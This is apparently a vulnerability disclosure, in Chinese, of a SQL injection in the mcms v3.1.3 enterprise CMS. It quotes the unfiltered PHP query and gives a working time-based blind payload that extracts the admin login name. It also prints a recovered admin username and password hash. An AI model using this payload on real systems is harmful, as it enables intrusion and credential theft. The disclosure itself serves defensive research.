### 简要描述:
mcms最新版SQL注入漏洞(可出任意数据)
### 详细说明:
掌易科技的程序员反应相当快啊,确认漏洞当天就修复以后出新版本了,前面在wooyun提的几个漏洞新版的mcms做了相应的处理,发布了新版v_3.1.3.enterprise,再来研究研究。
注入一枚: GET /app/public/gov.shop.order.php?m=view&order_id=1(注意public文件夹是安装系统时取的名字)其中order_id没有过滤,直接进行sql执行。
```
function m__view(){
global $dbm,$result,$V,$C,$order_id;
check_level('GA0101',AJAX);
$_GET['order_id'] = isset($_GET['order_id']) ? trim($_GET['order_id']) : '';
$sql="select * from ".TB_PRE."order_comment where order_id=".$_GET['order_id'];
$rs = $dbm->query($sql);
$result = get_order_info($_GET['order_id']);
$result['order_comment'] = $rs['list'];
$order_id = explode(',',$_GET['order_id']);
//print_r($order_id);
}
```
order_id没有过滤,直接进行sql执行
Payload:GET提交
```
/app/public/gov.shop.order.php?m=view&order_id=0/**/or(select/**/if(ord(mid((select/**/login_name/**/from/**/mcms_user/**/limit/**/0,1),1,1))%3d108,sleep(1),0))%23
```
因为是time-based blind 注入,猜测管理员用户名的第一个字母时,若错误,不延迟,如下图
[<img src="https://images.seebug.org/upload/201504/11233925e7b27278507908eeab2a21f2569f97df.jpg" alt="错误副本.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/11233925e7b27278507908eeab2a21f2569f97df.jpg)
若正确,延迟,如下图
[<img src="https://images.seebug.org/upload/201504/1123393873df4e6032c3068ab6cfe5490be87e31.jpg" alt="成功副本.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/1123393873df4e6032c3068ab6cfe5490be87e31.jpg)
按上面的方法依次做下去(burp intruder或者自己写个脚本跑),可测试管理员用户名为:mcmsadmin,密码为: f6fdffe48c908deb0f4c3bd36c032e72
### 漏洞证明:
见 详细说明
京公网安备 11010502034610号
暂无评论